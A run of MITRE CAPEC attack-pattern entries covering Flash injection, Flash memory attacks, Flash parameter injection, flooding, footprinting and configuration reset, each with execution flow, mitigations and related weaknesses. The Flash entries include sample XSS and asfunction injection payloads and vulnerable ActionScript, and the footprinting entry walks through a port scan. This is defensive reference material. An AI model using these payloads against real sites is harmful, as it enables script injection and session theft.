Spider the website for all available URLs that reference a Flash application.
List all uninitialized global variables (such as _root., _global., _level0.*) in ActionScript, registered global variables in included files, load variables to external movies.

Experiment

Determine the application's susceptibility to Flash injection: Determine the application's susceptibility to Flash injection. For each URL identified in the explore phase, the attacker attempts to use various techniques such as direct load asfunction, controlled evil page/host, Flash HTML injection, and DOM injection to determine whether the application is susceptible to Flash injection.

Techniques
Test the page using direct load asfunction, getURL,javascript:gotRoot("")///d.jpg
Test the page using controlled evil page/host, http://example.com/evil.swf
Test the page using Flash HTML injection, "'><img src='asfunction:getURL,javascript:gotRoot("")//.jpg' >
Test the page using DOM injection, (gotRoot(''))

Exploit

Inject malicious content into target: Inject malicious content into target utilizing vulnerable injection vectors identified in the Experiment phase

Prerequisites

The target must be capable of running Flash applications. In some cases, the victim must follow an attacker-supplied link.

Skills Required

[Level: Medium]

The attacker needs to have knowledge of Flash, especially how to insert content the executes commands.

Resources Required

None: No specialized resources are required to execute this type of attack. The attacker may need to be able to serve the injected Flash content.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Integrity	Modify Data
Confidentiality	Read Data
Authorization	Execute Unauthorized Commands
Accountability Authentication Authorization Non-Repudiation	Gain Privileges
Access Control Authorization	Bypass Protection Mechanism

Mitigations

Implementation: remove sensitive information such as user name and password in the SWF file.

Implementation: use validation on both client and server side.

Implementation: remove debug information.

Implementation: use SSL when loading external data

Implementation: use crossdomain.xml file to allow the application domain to load stuff or the SWF file called by other domain.

Example Instances

In the following example, the SWF file contains

getURL('javascript:SomeFunc("someValue")','','GET')

A request like

http://example.com/noundef.swf?a=0:0;alert('XSS')

becomes

javascript:SomeFunc("someValue")?a=0:0;alert(123)

Related Weaknesses

CWE-ID	Weakness Name
20	Improper Input Validation
184	Incomplete List of Disallowed Inputs
697	Incorrect Comparison

References

[REF-46] Stefano Di Paola. "Finding Vulnerabilities in Flash Applications". OWASP Appsec 2007. 2007-11-15.

[REF-47] Rudra K. Sinha Roy. "A Lazy Pen Tester's Guide to Testing Flash Applications". iViz. <http://www.ivizsecurity.com/blog/web-application-security/testing-flash-applications-pen-tester-guide/>.

[REF-48] Peleus Uhley. "Creating More Secure SWF Web Application". Adobe Systems Incorporated. <http://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Consequences
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-458: Flash Memory Attacks

Attack Pattern ID: 458

Abstraction: Detailed

View customized information:

Description

Extended Description

Such attacks are very difficult to detect because the malicious code resides outside the filesystem or RAM, and in the underlying byte-code that drives the processor. Many devices, such as the recent attacks against digital picture frames, contain only a microprocessor and a small amount of solid-state memory, rendering these devices ideal for "flash" based malware or malicious logic.

One of the pernicious characteristics of flash memory based attacks is that the malicious code can survive even a total format of the hard-drive and reinstallation of the host operating system. Virtually any device which can be integrated into a computer system is susceptible to these attacks. Additionally, any peripheral device which interfaces with the computer bus could extract or sniff confidential data, even on systems employing full-disk encryption. Trojan code placed into a video card's chipset would continue to perform its function irrespective of the host operating system, and would be invisible to all known antivirus. The threats extend to consumer products such as camcorders, digital cameras, or any consumer electronic device with an embedded microcontroller.

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	456	Infected Memory
PeerOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	665	Exploitation of Thunderbolt Protection Flaws

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Manipulate System Resources

Related Weaknesses

CWE-ID	Weakness Name
1282	Assumed-Immutable Data is Stored in Writable Memory

References

[REF-379] Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook and Matthew Fallon. "Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft)". National Institute of Standards and Technology (NIST). 2021-10-28. <https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf>. URL validated: 2022-02-16.

[REF-394] Robert Lemos. "Researchers: Rootkits headed for BIOS". SecurityFocus. 2006.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-174: Flash Parameter Injection

Attack Pattern ID: 174

Abstraction: Detailed

View customized information:

Description

Extended Description

These 'FlashVars' are most often passed to the Flash file via URL arguments or from the Object or Embed tag within the embedding HTML document. If these FlashVars are not properly sanitized, an adversary may be able to embed malicious content (such as scripts) into the HTML document.

The injected parameters can also provide the adversary control over other objects within the Flash file as well as full control over the parent document's DOM model. As such, this is a form of HTTP parameter injection, but the abilities granted to the Flash document (such as access to a page's document model, including associated cookies) make this attack more flexible. Flash Parameter Injection attacks can also preface further attacks such as various forms of Cross-Site Scripting (XSS) attacks in addition to Session Hijacking attacks.

Likelihood Of Attack

High

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	182	Flash Injection
CanAlsoBe	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	460	HTTP Parameter Pollution (HPP)
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	63	Cross-Site Scripting (XSS)
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	178	Cross-Site Flashing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Spider: Using a browser or an automated tool, an adversary records all instances of HTML documents that have embedded Flash files. If there is an embedded Flash file, they list how to pass global parameters to the Flash file from the embedding object.

Techniques
Use an automated tool to record all instances of URLs which have embedded Flash files and list the parameters passing to the Flash file.
Use a browser to manually explore the website to see whether the HTML document has embedded Flash files or not and list the parameters passing to the Flash file.

Experiment

Determine the application susceptibility to Flash parameter injection: Determine the application susceptibility to Flash parameter injection. For each URL identified in the Explore phase, the adversary attempts to use various techniques such as DOM based, reflected, flashvars, and persistent attacks depending on the type of parameter passed to the embedded Flash file.

Techniques
When the JavaScript 'document.location' variable is used as part of the parameter, inject '#' and the payload into the parameter in the URL.
When the name of the Flash file is exposed as a form or a URL parameter, the adversary injects '?' and the payload after the file name in the URL to override some global value.
When the arguments passed in the 'flashvars' attributes, the adversary injects '&' and payload in the URL.
If some of the attributes of the <object> tag are received as parameters, the 'flashvars' attribute is injected into the <object> tag without the creator of the Web page ever intending to allow arguments to be passed into the Flash file.
If shared objects are used to save data that is entered by the user persistent Flash parameter injection may occur, with malicious code being injected into the Flash file and executed, every time the Flash file is loaded.

Exploit

Execute Flash Parameter Injection Attack: Inject parameters into Flash file. Based on the results of the Experiment phase, the adversary crafts the underlying malicious URL containing injected Flash parameters and submits it to the web server. Once the web server receives the request, the embedding HTML document will controllable by the adversary.
Techniques
Craft underlying malicious URL and send it to the web server to take control of the embedding HTML document.

Skills Required

[Level: Medium]

The adversary need inject values into the global parameters to the Flash file and understand the parent HTML document DOM structure. The adversary needs to be smart enough to convince the victim to click on their crafted link.

Resources Required

The adversary must convince the victim to click their crafted link.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Authorization	Execute Unauthorized Commands

Mitigations

User input must be sanitized according to context before reflected back to the user. The JavaScript function 'encodeURI' is not always sufficient for sanitizing input intended for global Flash parameters. Extreme caution should be taken when saving user input in Flash cookies. In such cases the Flash file itself will need to be fixed and recompiled, changing the name of the local shared objects (Flash cookies).

Example Instances

The following are examples for different types of parameters passed to the Flash file.

DOM-based Flash parameter injection

</object>

Passing parameter in an embedded URI

Passing parameter in flashvars

Persistent Flash Parameter Injection

// Create a new shared object or read an existing one

mySharedObject = SharedObject.getLocal("flashToLoad");
if (_root.flashfile == undefined) {

// Check whether there is a shared object saved

if (mySharedObject.data.flash == null) {

// Set a default

value _root.flashfile = "defaultFlash.swf";

} else {

// Read the flash file to load from the shared object

_root.flashfile = mySharedObject.data.flash;

}

// Store the flash file's name in the shared object

mySharedObject.data.flash = _root.flashfile;

// Load the flash file

getURL(_root.flashfile);

If an unsuspecting user is lured by an adversary to click on link like this: http://example.com/vulnerable.swf?flashfile=javascript:alert(document.domain)

The result will be not merely a one-time execution of the JavaScript code in the victim's browser in the context of the domain with the vulnerable Flash file, but every time the Flash is loaded, whether by direct reference or embedded inside the same domain, the JavaScript will be executed again.

Related Weaknesses

CWE-ID	Weakness Name
88	Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')

References

[REF-40] Yuval B., Ayal Y. and Adi S.. "Flash Parameter Injection: A Security Advisory". IBM Rational Security Team. 2008-09-24. <http://blog.watchfire.com/FPI.pdf>.

[REF-560] "Elaborate Ways to Exploit XSS: Flash Parameter Injection (FPI)". Acunetix. 2014-04-08. <https://www.acunetix.com/blog/articles/elaborate-ways-exploit-xss-flash-parameter-injection/>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Phases, Description Summary, Related_Attack_Patterns
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Description, Example_Instances, Execution_Flow, References, Related_Attack_Patterns, Related_Weaknesses, Skills_Required
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow, Skills_Required
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Example_Instances, Execution_Flow, Extended_Description, Resources_Required, Skills_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-125: Flooding

Attack Pattern ID: 125

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	482	TCP Flood
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	486	UDP Flood
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	487	ICMP Flood
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	488	HTTP Flood
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	489	SSL Flood
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	490	Amplification
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	528	XML Flood
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	666	BlueSmacking

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

Any target that services requests is vulnerable to this attack on some level of scale.

Resources Required

A script or program capable of generating more requests than the target can handle, or a network or cluster of objects all capable of making simultaneous requests.

Consequences

Scope	Impact	Likelihood
Availability	Unreliable Execution Resource Consumption

Mitigations

Ensure that protocols have specific limits of scale configured.

Specify expectations for capabilities and dictate which behaviors are acceptable when resource allocation reaches limits.

Uniformly throttle all requests in order to make it more difficult to consume resources more quickly than they can again be freed.

Related Weaknesses

CWE-ID	Weakness Name
404	Improper Resource Shutdown or Release
770	Allocation of Resources Without Limits or Throttling

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1498.001	Network Denial of Service: Direct Network Flood
1499	Endpoint Denial of Service

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
10	Denial of Service

Relevant to the OWASP taxonomy mapping

Entry Name
Traffic flood

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Activation_Zone, Attack_Motivation-Consequences, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-169: Footprinting

Attack Pattern ID: 169

Abstraction: Meta

View customized information:

Description

An adversary engages in probing and exploration activities to identify constituents and properties of the target.

Extended Description

Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. Although similar to fingerprinting, footprinting aims to get a more holistic view of a system or network, whereas fingerprinting is more targeted to a specific application or operating system. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.

Likelihood Of Attack

High

Typical Severity

Very Low

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	292	Host Discovery
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	300	Port Scanning
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	309	Network Topology Mapping
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	497	File Discovery
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	529	Malware-Directed Internal Reconnaissance
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	573	Process Footprinting
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	574	Services Footprinting
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	575	Account Footprinting
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	576	Group Permission Footprinting
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	577	Owner Footprinting
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	580	System Footprinting
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	646	Peripheral Footprinting
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	694	System Location Discovery

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Request Footprinting: The attacker examines the website information and source code of the website and uses automated tools to get as much information as possible about the system and organization.

Techniques
Open Source Footprinting: Examine the website about the organization and skim through the webpage's HTML source to look for comments.
Network Enumeration: Perform various queries (Registrar Query, Organizational Query, Domain Query, Network Query, POC Query) on the many whois databases found on the internet to identify domain names and associated networks.
DNS Interrogation: Once basic information is gathered the attack could begin to query DNS.
Other Techniques: Use ping sweep, TCP scan, UDP scan, OS Identification various techniques to gain more information about the system and network.

Prerequisites

An application must publicize identifiable information about the system or application through voluntary or involuntary means. Certain identification details of information systems are visible on communication networks (e.g., if an adversary uses a sniffer to inspect the traffic) due to their inherent structure and protocol standards. Any system or network that can be detected can be footprinted. However, some configuration choices may limit the useful information that can be collected during a footprinting attack.

Skills Required

[Level: Low]

The adversary knows how to send HTTP request, run the scan tool.

Resources Required

The adversary requires a variety of tools to collect information about the target. These include port/network scanners and tools to analyze responses from applications to determine version and configuration information. Footprinting a system adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Keep patches up to date by installing weekly or daily if possible.

Shut down unnecessary services/ports.

Change default passwords by choosing strong passwords.

Curtail unexpected input.

Encrypt and password-protect sensitive data.

Avoid including information that has the potential to identify and compromise your organization's security such as access to business plans, formulas, and proprietary documents.

Example Instances

In this example let us look at the website http://www.example.com to get much information we can about Alice. From the website, we find that Alice also runs foobar.org. We type in www example.com into the prompt of the Name Lookup window in a tool, and our result is this IP address: 192.173.28.130 We type the domain into the Name Lookup prompt and we are given the same IP. We can safely say that example and foobar.org are hosted on the same box. But if we were to do a reverse name lookup on the IP, which domain will come up? www.example.com or foobar.org? Neither, the result is nijasvspirates.org. So nijasvspirates.org is the name of the box hosting 31337squirrel.org and foobar.org. So now that we have the IP, let's check to see if nijasvspirates is awake. We type the IP into the prompt in the Ping window. We'll set the interval between packets to 1 millisecond. We'll set the number of seconds to wait until a ping times out to 5. We'll set the ping size to 500 bytes and we'll send ten pings. Ten packets sent and ten packets received. nijasvspirates.org returned a message to my computer within an average of 0.35 seconds for every packet sent. nijasvspirates is alive. We open the Whois window and type nijasvspirates.org into the Query prompt, and whois.networksolutions.com into the Server prompt. This means we'll be asking Network Solutions to tell us everything they know about nijasvspirates.org. The result is this laundry list of info: Registrant: FooBar (nijasvspirates -DOM) p.o.box 11111 SLC, UT 84151 US Domain Name: nijasvspirates.ORG Administrative Contact, Billing Contact: Smith, John jsmith@anonymous.net FooBar p.o.box 11111 SLC, UT 84151 555-555-6103 Technical Contact: Johnson, Ken kj@fierymonkey.org fierymonkey p.o.box 11111 SLC, UT 84151 555-555-3849 Record last updated on 17-Aug-2001. Record expires on 11-Aug-2002. Record created on 11-Aug-2000. Database last updated on 12-Dec-2001 04:06:00 EST. Domain servers in listed order: NS1. fierymonkey.ORG 192.173.28.130 NS2. fierymonkey.ORG 64.192.168.80 A corner stone of footprinting is Port Scanning. Let's port scan nijasvspirates.org and see what kind of services are running on that box. We type in the nijasvspirates IP into the Host prompt of the Port Scan window. We'll start searching from port number 1, and we'll stop at the default Sub7 port, 27374. Our results are: 21 TCP ftp 22 TCP ssh SSH-1.99-OpenSSH_2.30 25 TCP smtp 53 TCP domain 80 TCP www 110 TCP pop3 111 TCP sunrpc 113 TCP ident Just by this we know that Alice is running a website and email, using POP3, SUNRPC (SUN Remote Procedure Call), and ident.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1217	Browser Bookmark Discovery
1592	Gather Victim Host Information
1595	Active Scanning

References

[REF-31] Manic Velocity. "Footprinting And The Basics Of Hacking". Web Textfiles. <http://web.textfiles.com/hacking/footprinting.txt>.

[REF-32] Eddie Sutton. "Footprint: What Is And How Do You Erase Them". <http://www.infosecwriters.com/text_resources/pdf/Footprinting.pdf>.

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pp. 38-39. 6th Edition. McGraw Hill. 2009.

[REF-34] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Section 3.1 Introduction, pg. 47. 3rd "Zero Day" Edition,. Insecure.com LLC, ISBN: 978-0-9799587-1-7. 2008.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Description, Extended_Description, Taxonomy_Mappings

CAPEC-166: Force the System to Reset Values

Attack Pattern ID: 166

Abstraction: Standard

View customized information:

Description

Extended Description

Since these functions are usually intended as emergency features to return an application to a stable configuration if the current configuration degrades functionality, they may not be as strongly secured as other configuration options. The resetting of values is dangerous as it may enable undesired functionality, disable services, or modify access controls. At the very least this is a nuisance attack since the administrator will need to re-apply their configuration. At worst, this attack can open avenues for powerful attacks against the application, and, if it isn't obvious that the configuration has been reset, these vulnerabilities may be present a long time before they are notices.

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	161	Infrastructure Manipulation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Manipulate System Resources

Prerequisites

The targeted application must have a reset function that returns the configuration of the application to an earlier state.

The reset functionality must be inadequately protected against use.

Resources Required

None: No specialized resources are required to execute this type of attack. In some cases, the attacker may need special client applications in order to execute the reset functionality.

Related Weaknesses

CWE-ID	Weakness Name
306	Missing Authentication for Critical Function
1221	Incorrect Register Defaults or Module Parameters
1232	Improper Lock Behavior After Power State Transition

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated @Abstraction
